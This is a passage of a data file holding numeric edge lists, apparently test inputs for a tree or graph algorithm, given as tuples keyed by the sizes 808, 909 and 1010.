382],[4382,4383],[4383,4384],[4384,4385],[4385,4386],[4386,4387],[4387,4388],[4388,4389],[4389,4390],[4390,4391],[4391,4392],[4392,4393],[4393,4394],[4394,4395],[4395,4396],[4396,4397],[4397,4398],[4398,4399],[4399,4400],[4400,4401],[4401,4402],[4402,4403],[4403,4404],[4404,4405],[4405,4406],[4406,4407],[4407,4408],[4408,4409],[4409,4410],[4410,4411],[4411,4412],[4412,4413],[4413,4414],[4414,4415],[4415,4416],[4416,4417],[4417,4418],[4418,4419],[4419,4420],[4420,4421],[4421,4422],[4422,4423],[4423,4424],[4424,4425],[4425,4426],[4426,4427],[4427,4428],[4428,4429],[4429,4430],[4430,4431],[4431,4432],[4432,4433],[4433,4434],[4434,4435],[4435,4436],[4436,4437],[4437,4438],[4438,4439],[4439,4440],[4440,4441],[4441,4442],[4442,4443],[4443,4444],[4444,4445],[4445,4446],[4446,4447],[4447,4448],[4448,4449],[4449,4450],[4450,4451],[4451,4452],[4452,4453],[4453,4454],[4454,4455],[4455,4456],[4456,4457],[4457,4458],[4458,4459],[4459,4460],[4460,4461],[4461,4462],[4462,4463],[4463,4464],[4464,4465],[4465,4466],[4466,4467],[4467,4468],[4468,4469],[4469,4470],[4470,4471],[4471,4472],[4472,4473],[4473,4474],[4474,4475],[4475,4476],[4476,4477],[4477,4478],[4478,4479],[4479,4480],[4480,4481],[4481,4482],[4482,4483],[4483,4484],[4484,4485],[4485,4486],[4486,4487],[4487,4488],[4488,4489],[4489,4490],[4490,4491],[4491,4492],[4492,4493],[4493,4494],[4494,4495],[4495,4496],[4496,4497],[4497,4498],[4498,4499],[4499,4500],[4500,4501],[4501,4502],[4502,4503],[4503,4504],[4504,4505],[4505,4506],[4506,4507],[4507,4508],[4508,4509],[4509,4510],[4510,4511],[4511,4512],[4512,4513],[4513,4514],[4514,4515],[4515,4516],[4516,4517],[4517,4518],[4518,4519],[4519,4520],[4520,4521],[4521,4522],[4522,4523],[4523,4524],[4524,4525],[4525,4526],[4526,4527],[4527,4528],[4528,4529],[4529,4530],[4530,4531],[4531,4532],[4532,4533],[4533,4534],[4534,4535],[4535,4536],[4536,4537],[4537,4538],[4538,4539],[4539,4540],[4540,4541],[4541,4542],[4542,4543],[4543,4544],[4544,4545],[4545,4546],[4546,4547],[4547,4548],[4548,4549],[4549,4550],[4550,4551],[4551,4552],[4552,4553],[4553,4554],[4554,4555],[4555,4556],[4556,4557],[4557,4558],[4558,4559],[4559,4560],[4560,4561],[4561,4562],[4562,4563],[4563,4564],[4564,4565],[4565,4566],[4566,4567],[4567,4568],[4568,4569],[4569,4570],[4570,4571],[4571,4572],[4572,4573],[4573,4574],[4574,4575],[4575,4576],[4576,4577],[4577,4578],[4578,4579],[4579,4580],[4580,4581],[4581,4582],[4582,4583],[4583,4584],[4584,4585],[4585,4586],[4586,4587],[4587,4588],[4588,4589],[4589,4590],[4590,4591],[4591,4592],[4592,4593],[4593,4594],[4594,4595],[4595,4596],[4596,4597],[4597,4598],[4598,4599],[4599,4600],[4600,4601],[4601,4602],[4602,4603],[4603,4604],[4604,4605],[4605,4606],[4606,4607],[4607,4608],[4608,4609],[4609,4610],[4610,4611],[4611,4612],[4612,4613],[4613,4614],[4614,4615],[4615,4616],[4616,4617],[4617,4618],[4618,4619],[4619,4620],[4620,4621],[4621,4622],[4622,4623],[4623,4624],[4624,4625],[4625,4626],[4626,4627],[4627,4628],[4628,4629],[4629,4630],[4630,4631],[4631,4632],[4632,4633],[4633,4634],[4634,4635],[4635,4636],[4636,4637],[4637,4638],[4638,4639],[4639,4640],[4640,4641],[4641,4642],[4642,4643],[4643,4644],[4644,4645],[4645,4646],[4646,4647],[4647,4648],[4648,4649],[4649,4650],[4650,4651],[4651,4652],[4652,4653],[4653,4654],[4654,4655],[4655,4656],[4656,4657],[4657,4658],[4658,4659],[4659,4660],[4660,4661],[4661,4662],[4662,4663],[4663,4664],[4664,4665],[4665,4666],[4666,4667],[4667,4668],[4668,4669],[4669,4670],[4670,4671],[4671,4672],[4672,4673],[4673,4674],[4674,4675],[4675,4676],[4676,4677],[4677,4678],[4678,4679],[4679,4680],[4680,4681],[4681,4682],[4682,4683],[4683,4684],[4684,4685],[4685,4686],[4686,4687],[4687,4688],[4688,4689],[4689,4690],[4690,4691],[4691,4692],[4692,4693],[4693,4694],[4694,4695],[4695,4696],[4696,4697],[4697,4698],[4698,4699],[4699,4700],[4700,4701],[4701,4702],[4702,4703],[4703,4704],[4704,4705],[4705,4706],[4706,4707],[4707,4708],[4708,4709],[4709,4710],[4710,4711],[4711,4712],[4712,4713],[4713,4714],[4714,4715],[4715,4716],[4716,4717],[4717,4718],[4718,4719],[4719,4720],[4720,4721],[4721,4722],[4722,4723],[4723,4724],[4724,4725],[4725,4726],[4726,4727],[4727,4728],[4728,4729],[4729,4730],[4730,4731],[4731,4732],[4732,4733],[4733,4734],[4734,4735],[4735,4736],[4736,4737],[4737,4738],[4738,4739],[4739,4740],[4740,4741],[4741,4742],[4742,4743],[4743,4744],[4744,4745],[4745,4746],[4746,4747],[4747,4748],[4748,4749],[4749,4750],[4750,4751],[4751,4752],[4752,4753],[4753,4754],[4754,4755],[4755,4756],[4756,4757],[4757,4758],[4758,4759],[4759,4760],[4760,4761],[4761,4762],[4762,4763],[4763,4764],[4764,4765],[4765,4766],[4766,4767],[4767,4768],[4768,4769],[4769,4770],[4770,4771],[4771,4772],[4772,4773],[4773,4774],[4774,4775],[4775,4776],[4776,4777],[4777,4778],[4778,4779],[4779,4780],[4780,4781],[4781,4782],[4782,4783],[4783,4784],[4784,4785],[4785,4786],[4786,4787],[4787,4788],[4788,4789],[4789,4790],[4790,4791],[4791,4792],[4792,4793],[4793,4794],[4794,4795],[4795,4796],[4796,4797],[4797,4798],[4798,4799],[4799,4800],[4800,4801],[4801,4802],[4802,4803],[4803,4804],[4804,4805],[4805,4806],[4806,4807],[4807,4808],[4808,4809],[4809,4810],[4810,4811],[4811,4812],[4812,4813],[4813,4814],[4814,4815],[4815,4816],[4816,4817],[4817,4818],[4818,4819],[4819,4820],[4820,4821],[4821,4822],[4822,4823],[4823,4824],[4824,4825],[4825,4826],[4826,4827],[4827,4828],[4828,4829],[4829,4830],[4830,4831],[4831,4832],[4832,4833],[4833,4834],[4834,4835],[4835,4836],[4836,4837],[4837,4838],[4838,4839],[4839,4840],[4840,4841],[4841,4842],[4842,4843],[4843,4844],[4844,4845],[4845,4846],[4846,4847],[4847,4848],[4848,4849],[4849,4850],[4850,4851],[4851,4852],[4852,4853],[4853,4854],[4854,4855],[4855,4856],[4856,4857],[4857,4858],[4858,4859],[4859,4860],[4860,4861],[4861,4862],[4862,4863],[4863,4864],[4864,4865],[4865,4866],[4866,4867],[4867,4868],[4868,4869],[4869,4870],[4870,4871],[4871,4872],[4872,4873],[4873,4874],[4874,4875],[4875,4876],[4876,4877],[4877,4878],[4878,4879],[4879,4880],[4880,4881],[4881,4882],[4882,4883],[4883,4884],[4884,4885],[4885,4886],[4886,4887],[4887,4888],[4888,4889],[4889,4890],[4890,4891],[4891,4892],[4892,4893],[4893,4894],[4894,4895],[4895,4896],[4896,4897],[4897,4898],[4898,4899],[4899,4900],[4900,4901],[4901,4902],[4902,4903],[4903,4904],[4904,4905],[4905,4906],[4906,4907],[4907,4908],[4908,4909],[4909,4910],[4910,4911],[4911,4912],[4912,4913],[4913,4914],[4914,4915],[4915,4916],[4916,4917],[4917,4918],[4918,4919],[4919,4920],[4920,4921],[4921,4922],[4922,4923],[4923,4924],[4924,4925],[4925,4926],[4926,4927],[4927,4928],[4928,4929],[4929,4930],[4930,4931],[4931,4932],[4932,4933],[4933,4934],[4934,4935],[4935,4936],[4936,4937],[4937,4938],[4938,4939],[4939,4940],[4940,4941],[4941,4942],[4942,4943],[4943,4944],[4944,4945],[4945,4946],[4946,4947],[4947,4948],[4948,4949],[4949,4950],[4950,4951],[4951,4952],[4952,4953],[4953,4954],[4954,4955],[4955,4956],[4956,4957],[4957,4958],[4958,4959],[4959,4960],[4960,4961],[4961,4962],[4962,4963],[4963,4964],[4964,4965],[4965,4966],[4966,4967],[4967,4968],[4968,4969],[4969,4970],[4970,4971],[4971,4972],[4972,4973],[4973,4974],[4974,4975],[4975,4976],[4976,4977],[4977,4978],[4978,4979],[4979,4980],[4980,4981],[4981,4982],[4982,4983],[4983,4984],[4984,4985],[4985,4986],[4986,4987],[4987,4988],[4988,4989],[4989,4990],[4990,4991],[4991,4992],[4992,4993],[4993,4994],[4994,4995],[4995,4996],[4996,4997],[4997,4998],[4998,4999]]
),
(808,
[[0, 1], [1, 2], [0, 3], [2, 4], [1, 5], [2, 6], [3, 7], [1, 8], [4, 9],
[1, 10], [3, 11], [8, 12], [7, 13], [8, 14], [0, 15], [1, 16], [6, 17],
[9, 18], [17, 19], [15, 20], [10, 21], [16, 22], [0, 23], [6, 24], [
2, 25
], [2, 26], [0, 27], [2, 28], [19, 29], [13, 30], [18, 31], [12, 32],
[5, 33], [5, 34], [1, 35], [20, 36], [19, 37], [15, 38], [6, 39], [
9, 40
], [10, 41], [1, 42], [35, 43], [1, 44], [42, 45], [27, 46], [11, 47],
[41, 48], [41, 49], [2, 50], [28, 51], [22, 52], [2, 53], [15, 54],
[26, 55], [0, 56], [35, 57], [3, 58], [17, 59], [52, 60], [0, 61], [
61, 62
], [56, 63], [16, 64], [5, 65], [7, 66], [6, 67], [9, 68], [53, 69],
[20, 70], [11, 71], [41, 72], [33, 73], [35, 74], [27, 75], [46, 76],
[15, 77], [19, 78], [26, 79], [32, 80], [29, 81], [15, 82], [55, 83],
[77, 84], [25, 85], [50, 86], [19, 87], [63, 88], [63, 89], [28, 90],
[16, 91], [52, 92], [78, 93], [13, 94], [74, 95], [95, 96], [64, 97], [
41, 98
], [6, 99], [59, 100], [23, 101], [30, 102], [50, 103], [56, 104], [
59, 105
], [22, 106], [67, 107], [94, 108], [92, 109], [41, 110], [58, 111], [
70, 112
], [47, 113], [65, 114], [94, 115], [60, 116], [2, 117], [12, 118], [
96, 119
], [103, 120], [88, 121], [40, 122], [34, 123], [1, 124], [35, 125], [
6, 126
], [22, 127], [24, 128], [116, 129], [25, 130], [56, 131], [29, 132], [
41, 133
], [108, 134], [74, 135], [74, 136], [130, 137], [1, 138], [37, 139], [
14, 140
], [130, 141], [47, 142], [101, 143], [1, 144], [28, 145], [114, 146],
[16, 147], [13, 148], [44, 149], [145, 150], [124, 151], [84, 152], [
119, 153
], [56, 154], [84, 155], [144, 156], [14, 157], [88, 158], [155, 159],
[125, 160], [130, 161], [87, 162], [74, 163], [45, 164], [7, 165], [
34, 166
], [31, 167], [123, 168], [8, 169], [137, 170], [39, 171], [157, 172],
[32, 173], [55, 174], [90, 175], [99, 176], [145, 177], [83, 178],
[1, 179], [57, 180], [151, 181], [115, 182], [159, 183], [99, 184],
[127, 185], [90, 186], [136, 187], [148, 188], [163, 189], [19, 190], [
162, 191
], [73, 192], [32, 193], [157, 194], [68, 195], [91, 196], [90, 197],
[12, 198], [124, 199], [199, 200], [86, 201],
[39, 202], [153, 203], [91, 204], [87, 205], [59, 206], [3, 207], [
114, 208
], [190, 209], [135, 210], [76, 211], [26, 212], [185, 213], [
143, 214
], [138, 215], [14, 216], [94, 217], [202, 218], [199, 219], [
110, 220
], [163, 221], [47, 222], [144, 223], [163, 224], [141, 225], [
158, 226
], [58, 227], [76, 228], [212, 229], [29, 230], [15, 231], [67, 232], [
217, 233
], [108, 234], [218, 235], [202, 236], [231, 237], [171, 238], [
99, 239
], [177, 240], [240, 241], [218, 242], [214, 243], [20, 244], [
124, 245
], [83, 246], [142, 247], [58, 248], [126, 249], [121, 250], [
151, 251
], [150, 252], [83, 253], [223, 254], [69, 255], [34, 256], [191, 257],
[172, 258], [78, 259], [3, 260], [27, 261], [196, 262], [192, 263], [
9, 264
], [41, 265], [83, 266], [37, 267], [43, 268], [242, 269], [33, 270], [
219, 271
], [67, 272], [72, 273], [111, 274], [77, 275], [10, 276], [27, 277], [
175, 278
], [192, 279], [188, 280], [276, 281], [139, 282], [118, 283], [
119, 284
], [197, 285], [151, 286], [45, 287], [273, 288], [101, 289], [
94, 290
], [247, 291], [265, 292], [235, 293], [247, 294], [11, 295], [
182, 296
], [221, 297], [171, 298], [149, 299], [225, 300], [299, 301], [
236, 302
], [134, 303], [286, 304], [235, 305], [74, 306], [290, 307], [
117, 308
], [167, 309], [92, 310], [139, 311], [302, 312], [69, 313], [
239, 314
], [51, 315], [265, 316], [55, 317], [165, 318], [219, 319], [
174, 320
], [117, 321], [307, 322], [288, 323], [142, 324], [161, 325], [
198, 326
], [235, 327], [143, 328], [113, 329], [66, 330], [236, 331], [
129, 332
], [222, 333], [320, 334], [36, 335], [229, 336], [248, 337], [
303, 338
], [330, 339], [288, 340], [244, 341], [336, 342], [105, 343], [
157, 344
], [156, 345], [312, 346], [40, 347], [209, 348], [19, 349], [
155, 350
], [50, 351], [264, 352], [55, 353], [295, 354], [301, 355], [
153, 356
], [135, 357], [123, 358], [235, 359], [318, 360], [320, 361], [
3, 362
], [28, 363], [30, 364], [209, 365], [1, 366], [210, 367], [188, 368],
[33, 369], [24, 370], [367, 371], [296, 372], [62, 373], [371, 374], [
130, 375
], [126, 376], [357, 377], [108, 378], [269, 379], [47, 380], [
47, 381
], [127, 382], [327, 383], [324, 384], [224, 385], [96, 386], [
361, 387
], [143, 388], [228, 389], [263, 390], [17, 391], [225, 392], [
181, 393
], [327, 394], [46, 395], [382, 396], [371, 397], [162, 398], [
355, 399
], [358, 400], [149, 401], [241, 402], [58, 403], [317, 404], [
10, 405
], [129, 406], [10, 407], [139, 408], [269, 409], [96, 410], [
338, 411
], [310, 412], [352, 413], [359, 414], [301, 415], [7, 416], [
388, 417
], [311, 418], [387, 419], [375, 420], [411, 421], [175, 422], [
162, 423
], [402, 424], [326, 425], [226, 426], [232, 427], [301, 428], [
136, 429
], [347, 430], [38, 431], [9, 432], [54, 433], [130, 434], [
178, 435
], [289, 436], [125, 437], [374, 438], [312, 439], [322, 440], [
214, 441
], [348, 442], [91, 443], [327, 444], [266, 445], [102, 446], [
371, 447
], [307, 448], [200, 449], [359, 450], [176, 451], [217, 452], [
200, 453
], [431, 454], [117, 455], [231, 456], [250, 457], [100, 458], [
196, 459
], [260, 460], [272, 461], [386, 462], [15, 463], [8, 464], [
108, 465
], [456, 466], [465, 467], [367, 468], [118, 469], [370, 470], [
152, 471
], [293, 472], [416, 473], [197, 474], [431, 475], [469, 476], [
150, 477
], [424, 478], [233, 479], [173, 480], [431, 481], [358, 482], [
377, 483
], [198, 484], [189, 485], [259, 486], [461, 487], [210, 488], [
307, 489
], [188, 490], [422, 491], [454, 492], [171, 493], [21, 494], [
198, 495
], [231, 496], [343, 497], [284, 498], [448, 499], [205, 500], [
263, 501
], [472, 502], [43, 503], [306, 504], [364, 505], [134, 506], [
36, 507
], [61, 508], [500, 509], [389, 510], [348, 511], [488, 512], [
212, 513
], [57, 514], [216, 515], [514, 516], [114, 517], [227, 518], [
227, 519
], [313, 520], [436, 521], [323, 522], [515, 523], [280, 524], [
162, 525
], [502, 526], [178, 527], [490, 528], [109, 529], [198, 530], [
288, 531
], [191, 532], [448, 533], [218, 534], [129, 535], [499, 536], [
106, 537
], [499, 538], [287, 539], [54, 540], [416, 541], [206, 542], [
83, 543
], [348, 544], [370, 545], [357, 546], [380, 547], [308, 548], [
256, 549
], [202, 550], [308, 551], [126, 552], [469, 553], [302, 554], [
308, 555
], [78, 556], [83, 557], [147, 558], [140, 559], [85, 560], [
438, 561
], [268, 562], [301, 563], [234, 564], [547, 565], [152, 566], [
565, 567
], [134, 568], [235, 569], [212, 570], [372, 571], [377, 572], [
286, 573
], [165, 574], [259, 575], [345, 576], [527, 577], [168, 578], [
534, 579
], [509, 580], [512, 581], [375, 582], [21, 583], [287, 584], [
331, 585
], [77, 586], [131, 587], [443, 588], [3, 589], [77, 590], [34, 591], [
428, 592
], [458, 593], [396, 594], [238, 595], [522, 596], [28, 597], [
353, 598
], [497, 599], [318, 600], [465, 601], [270, 602], [256, 603], [
389, 604
], [307, 605], [536, 606], [92, 607], [243, 608], [58, 609], [
86, 610
], [308, 611], [301, 612], [333, 613], [514, 614], [459, 615], [
151, 616
], [377, 617], [338, 618], [246, 619], [199, 620], [351, 621], [
252, 622
], [285, 623], [611, 624], [543, 625], [198, 626], [407, 627], [
210, 628
], [393, 629], [211, 630], [111, 631], [326, 632], [347, 633], [
100, 634
], [206, 635], [183, 636], [318, 637], [266, 638], [243, 639], [
208, 640
], [551, 641], [490, 642], [458, 643], [178, 644], [505, 645], [
302, 646
], [11, 647], [329, 648], [149, 649], [608, 650], [153, 651], [
223, 652
], [604, 653], [572, 654], [604, 655], [542, 656], [541, 657], [
438, 658
], [104, 659], [490, 660], [38, 661], [212, 662], [161, 663], [
572, 664
], [553, 665], [640, 666], [31, 667], [66, 668], [113, 669], [
142, 670
], [19, 671], [370, 672], [542, 673], [43, 674], [532, 675], [
507, 676
], [52, 677], [389, 678], [449, 679], [475, 680], [98, 681], [
224, 682
], [85, 683], [351, 684], [209, 685], [242, 686], [646, 687], [
209, 688
], [225, 689], [457, 690], [325, 691], [68, 692], [505, 693], [
222, 694
], [197, 695], [227, 696], [296, 697], [567, 698], [473, 699], [
231, 700
], [595, 701], [448, 702], [261, 703], [479, 704], [357, 705], [
555, 706
], [358, 707], [570, 708], [350, 709], [321, 710], [174, 711], [
448, 712
], [337, 713], [618, 714], [415, 715], [222, 716], [140, 717], [
550, 718
], [629, 719], [640, 720], [245, 721], [249, 722], [336, 723], [
429, 724
], [43, 725], [207, 726], [419, 727], [694, 728], [136, 729], [
464, 730
], [130, 731], [681, 732], [395, 733], [572, 734], [425, 735], [
154, 736
], [539, 737], [345, 738], [386, 739], [55, 740], [192, 741], [
497, 742
], [674, 743], [723, 744], [131, 745], [244, 746], [42, 747], [
125, 748
], [136, 749], [298, 750], [152, 751], [15, 752], [157, 753], [
667, 754
], [511, 755], [479, 756], [86, 757], [47, 758], [580, 759], [
475, 760
], [632, 761], [259, 762], [400, 763], [93, 764], [301, 765], [
445, 766
], [405, 767], [294, 768], [281, 769], [25, 770], [199, 771], [
403, 772
], [731, 773], [119, 774], [87, 775], [394, 776], [547, 777], [
47, 778
], [717, 779], [779, 780], [522, 781], [231, 782], [212, 783], [
163, 784
], [581, 785], [224, 786], [536, 787], [762, 788], [211, 789], [
169, 790
], [215, 791], [749, 792], [757, 793], [152, 794], [505, 795], [
379, 796
], [691, 797], [638, 798], [376, 799], [41, 800], [109, 801], [
711, 802
], [649, 803], [514, 804], [616, 805], [46, 806], [538, 807]]
),
(909,
[[0,1],[0,2],[2,3],[0,4],[4,5],[0,6],[6,7],[0,8],[7,9],[1,10],[0,11],[10,12],[8,13],[3,14],[1,15],[1,16],[4,17],[7,18],[15,19],[1,20],[14,21],[9,22],[14,23],[15,24],[7,25],[0,26],[24,27],[13,28],[22,29],[18,30],[18,31],[17,32],[14,33],[20,34],[1,35],[14,36],[14,37],[30,38],[13,39],[6,40],[32,41],[17,42],[23,43],[23,44],[6,45],[27,46],[9,47],[4,48],[16,49],[31,50],[21,51],[21,52],[31,53],[53,54],[18,55],[3,56],[7,57],[52,58],[14,59],[10,60],[20,61],[17,62],[2,63],[36,64],[25,65],[53,66],[61,67],[23,68],[14,69],[29,70],[63,71],[12,72],[6,73],[11,74],[73,75],[60,76],[38,77],[61,78],[71,79],[20,80],[24,81],[60,82],[52,83],[68,84],[22,85],[36,86],[85,87],[9,88],[15,89],[56,90],[16,91],[67,92],[24,93],[63,94],[41,95],[57,96],[83,97],[90,98],[38,99],[54,100],[97,101],[4,102],[51,103],[31,104],[22,105],[102,106],[95,107],[71,108],[9,109],[53,110],[62,111],[110,112],[5,113],[27,114],[104,115],[35,116],[14,117],[0,118],[106,119],[37,120],[8,121],[26,122],[87,123],[49,124],[74,125],[61,126],[17,127],[89,128],[58,129],[33,130],[36,131],[50,132],[43,133],[121,134],[32,135],[113,136],[64,137],[73,138],[13,139],[133,140],[89,141],[36,142],[86,143],[117,144],[11,145],[70,146],[98,147],[82,148],[28,149],[61,150],[66,151],[59,152],[51,153],[49,154],[61,155],[76,156],[155,157],[57,158],[112,159],[19,160],[60,161],[88,162],[62,163],[52,164],[126,165],[48,166],[47,167],[136,168],[15,169],[7,170],[85,171],[61,172],[110,173],[81,174],[135,175],[60,176],[95,177],[171,178],[161,179],[44,180],[19,181],[175,182],[107,183],[23,184],[66,185],[122,186],[128,187],[147,188],[139,189],[135,190],[19,191],[103,192],[51,193],[158,194],[99,195],[75,196],[4,197],[26,198],[131,199],[167,200],[83,201],[131,202],[55,203],[32,204],[164,205],[98,206],[86,207],[170,208],[170,209],[188,210],[40,211],[46,212],[31,213],[18,214],[116,215],[13,216],[212,217],[148,218],[88,219],[19,220],[81,221],[137,222],[23,223],[58,224],[163,225],[145,226],[116,227],[45,228],[31,229],[47,230],[66,231],[82,232],[59,233],[229,234],[164,235],[122,236],[31,237],[143,238],[178,239],[32,240],[97,241],[89,242],[117,243],[191,244],[76,245],[25,246],[217,247],[106,248],[37,249],[12,250],[47,251],[163,252],[247,253],[253,254],[19,255],[245,256],[67,257],[108,258],[50,259],[115,260],[67,261],[248,262],[148,263],[149,264],[220,265],[54,266],[134,267],[2,268],[161,269],[265,270],[31,271],[83,272],[162,273],[267,274],[21,275],[72,276],[26,277],[112,278],[268,279],[41,280],[84,281],[196,282],[281,283],[109,284],[118,285],[66,286],[167,287],[142,288],[154,289],[262,290],[158,291],[216,292],[26,293],[30,294],[60,295],[276,296],[72,297],[215,298],[7,299],[69,300],[289,301],[54,302],[210,303],[280,304],[204,305],[186,306],[217,307],[305,308],[225,309],[13,310],[3,311],[110,312],[82,313],[155,314],[22,315],[66,316],[223,317],[252,318],[229,319],[247,320],[231,321],[190,322],[308,323],[26,324],[245,325],[123,326],[91,327],[308,328],[17,329],[78,330],[136,331],[7,332],[146,333],[318,334],[273,335],[161,336],[35,337],[241,338],[282,339],[133,340],[136,341],[8,342],[146,343],[117,344],[15,345],[102,346],[52,347],[21,348],[166,349],[131,350],[178,351],[142,352],[7,353],[255,354],[346,355],[162,356],[16,357],[253,358],[285,359],[23,360],[7,361],[96,362],[128,363],[231,364],[223,365],[275,366],[347,367],[244,368],[203,369],[55,370],[182,371],[170,372],[270,373],[315,374],[85,375],[346,376],[212,377],[102,378],[319,379],[252,380],[264,381],[351,382],[164,383],[233,384],[361,385],[175,386],[230,387],[331,388],[57,389],[119,390],[118,391],[251,392],[306,393],[255,394],[199,395],[238,396],[17,397],[197,398],[151,399],[356,400],[395,401],[191,402],[16,403],[13,404],[110,405],[313,406],[340,407],[161,408],[301,409],[44,410],[364,411],[272,412],[100,413],[312,414],[307,415],[347,416],[374,417],[187,418],[328,419],[118,420],[311,421],[321,422],[108,423],[395,424],[190,425],[299,426],[79,427],[68,428],[240,429],[386,430],[371,431],[5,432],[255,433],[320,434],[376,435],[81,436],[68,437],[54,438],[421,439],[423,440],[311,441],[41,442],[3,443],[400,444],[137,445],[253,446],[335,447],[376,448],[1,449],[212,450],[169,451],[383,452],[401,453],[383,454],[54,455],[59,456],[35,457],[121,458],[173,459],[388,460],[456,461],[81,462],[368,463],[219,464],[178,465],[114,466],[384,467],[104,468],[268,469],[170,470],[246,471],[319,472],[258,473],[326,474],[241,475],[25,476],[468,477],[444,478],[418,479],[405,480],[261,481],[447,482],[140,483],[30,484],[375,485],[75,486],[455,487],[64,488],[236,489],[454,490],[207,491],[431,492],[290,493],[84,494],[409,495],[315,496],[343,497],[480,498],[451,499],[155,500],[262,501],[111,502],[441,503],[237,504],[387,505],[275,506],[75,507],[259,508],[465,509],[433,510],[217,511],[450,512],[30,513],[479,514],[179,515],[102,516],[181,517],[153,518],[208,519],[380,520],[256,521],[276,522],[253,523],[417,524],[179,525],[305,526],[450,527],[407,528],[442,529],[99,530],[381,531],[89,532],[507,533],[347,534],[132,535],[445,536],[197,537],[255,538],[479,539],[322,540],[277,541],[342,542],[44,543],[443,544],[322,545],[96,546],[397,547],[195,548],[316,549],[13,550],[397,551],[405,552],[250,553],[365,554],[108,555],[213,556],[97,557],[406,558],[156,559],[421,560],[80,561],[328,562],[303,563],[243,564],[269,565],[485,566],[457,567],[371,568],[201,569],[337,570],[183,571],[221,572],[113,573],[447,574],[244,575],[429,576],[126,577],[69,578],[535,579],[303,580],[283,581],[567,582],[209,583],[21,584],[227,585],[21,586],[16,587],[268,588],[45,589],[107,590],[141,591],[40,592],[157,593],[328,594],[68,595],[225,596],[219,597],[301,598],[44,599],[515,600],[334,601],[229,602],[95,603],[177,604],[408,605],[119,606],[200,607],[334,608],[142,609],[437,610],[391,611],[272,612],[231,613],[566,614],[64,615],[186,616],[584,617],[9,618],[369,619],[21,620],[477,621],[17,622],[604,623],[228,624],[225,625],[615,626],[403,627],[90,628],[459,629],[171,630],[52,631],[626,632],[385,633],[96,634],[120,635],[161,636],[86,637],[14,638],[302,639],[402,640],[191,641],[355,642],[475,643],[267,644],[616,645],[10,646],[595,647],[295,648],[332,649],[78,650],[334,651],[402,652],[215,653],[328,654],[383,655],[461,656],[608,657],[590,658],[427,659],[115,660],[301,661],[579,662],[361,663],[602,664],[215,665],[181,666],[292,667],[126,668],[160,669],[640,670],[559,671],[301,672],[221,673],[226,674],[430,675],[403,676],[484,677],[395,678],[659,679],[169,680],[627,681],[48,682],[421,683],[589,684],[100,685],[662,686],[244,687],[440,688],[623,689],[626,690],[46,691],[148,692],[688,693],[87,694],[635,695],[609,696],[186,697],[317,698],[654,699],[412,700],[291,701],[481,702],[639,703],[596,704],[40,705],[382,706],[222,707],[445,708],[409,709],[612,710],[214,711],[658,712],[363,713],[399,714],[335,715],[274,716],[21,717],[109,718],[232,719],[551,720],[113,721],[78,722],[20,723],[172,724],[192,725],[291,726],[47,727],[378,728],[372,729],[349,730],[696,731],[362,732],[509,733],[603,734],[481,735],[633,736],[709,737],[610,738],[671,739],[525,740],[176,741],[329,742],[451,743],[23,744],[190,745],[473,746],[234,747],[470,748],[160,749],[599,750],[50,751],[176,752],[69,753],[525,754],[97,755],[692,756],[117,757],[364,758],[627,759],[393,760],[415,761],[222,762],[737,763],[461,764],[392,765],[28,766],[663,767],[274,768],[673,769],[607,770],[160,771],[222,772],[605,773],[342,774],[418,775],[269,776],[371,777],[235,778],[299,779],[725,780],[297,781],[233,782],[260,783],[214,784],[247,785],[170,786],[517,787],[612,788],[246,789],[52,790],[173,791],[490,792],[297,793],[451,794],[309,795],[65,796],[352,797],[178,798],[403,799],[338,800],[342,801],[282,802],[317,803],[361,804],[479,805],[141,806],[280,807],[303,808],[265,809],[172,810],[42,811],[39,812],[133,813],[339,814],[744,815],[765,816],[165,817],[323,818],[238,819],[95,820],[76,821],[37,822],[283,823],[410,824],[464,825],[666,826],[23,827],[669,828],[77,829],[512,830],[739,831],[813,832],[342,833],[18,834],[354,835],[641,836],[318,837],[480,838],[287,839],[521,840],[29,841],[224,842],[9,843],[119,844],[47,845],[291,846],[239,847],[249,848],[448,849],[347,850],[380,851],[354,852],[473,853],[55,854],[413,855],[635,856],[350,857],[454,858],[80,859],[550,860],[361,861],[660,862],[427,863],[535,864],[317,865],[162,866],[427,867],[732,868],[4,869],[611,870],[771,871],[311,872],[600,873],[809,874],[634,875],[618,876],[123,877],[373,878],[600,879],[686,880],[610,881],[361,882],[108,883],[397,884],[766,885],[440,886],[434,887],[627,888],[263,889],[316,890],[651,891],[668,892],[119,893],[696,894],[624,895],[133,896],[228,897],[71,898],[162,899],[496,900],[749,901],[802,902],[471,903],[117,904],[84,905],[212,906],[42,907],[351,908]]
),
(
1010,
[[0,1],[0,2],[1,3],[0,4],[0,5],[1,6],[1,7],[5,8],[7,9],[6,10],[5,11],[9,12],[7,13],[7,14],[13,15],[15,16],[4,17],[3,18],[16,19],[0,20],[18,21],[15,22],[9,23],[14,24],[19,25],[1,26],[24,27],[25,28],[22,29],[2,30],[15,31],[11,32],[27,33],[9,34],[30,35],[6,36],[20,37],[8,38],[15,39],[23,40],[7,41],[20,42],[6,43],[9,44],[14,45],[13,46],[35,47],[36,48],[27,49],[7,50],[48,51],[8,52],[25,53],[50,54],[34,55],[32,56],[16,57],[17,58],[53,59],[12,60],[28,61],[4,62],[20,63],[49,64],[7,65],[4,66],[64,67],[24,68],[47,69],[1,70],[56,71],[33,72],[71,73],[56,74],[62,75],[18,76],[58,77],[12,78],[2,79],[15,80],[74,81],[31,82],[73,83],[6,84],[48,85],[13,86],[67,87],[72,88],[78,89],[44,90],[72,91],[87,92],[48,93],[68,94],[76,95],[41,96],[30,97],[18,98],[56,99],[16,100],[55,101],[47,102],[8,103],[11,104],[93,105],[88,106],[3,107],[44,108],[18,109],[48,110],[14,111],[94,112],[109,113],[5,114],[59,115],[47,116],[26,117],[83,118],[75,119],[80,120],[72,121],[78,122],[107,123],[122,124],[1,125],[40,126],[68,127],[5,128],[90,129],[14,130],[12,131],[40,132],[57,133],[1,134],[85,135],[23,136],[97,137],[20,138],[10,139],[40,140],[6,141],[135,142],[112,143],[38,144],[70,145],[86,146],[100,147],[103,148],[40,149],[110,150],[35,151],[142,152],[86,153],[102,154],[97,155],[53,156],[86,157],[16,158],[49,159],[101,160],[122,161],[28,162],[107,163],[28,164],[9,165],[45,166],[98,167],[83,168],[63,169],[46,170],[49,171],[154,172],[111,173],[79,174],[37,175],[42,176],[38,177],[107,178],[95,179],[90,180],[78,181],[66,182],[88,183],[93,184],[162,185],[156,186],[83,187],[43,188],[125,189],[16,190],[107,191],[138,192],[164,193],[75,194],[108,195],[30,196],[45,197],[92,198],[160,199],[138,200],[68,201],[94,202],[135,203],[102,204],[24,205],[50,206],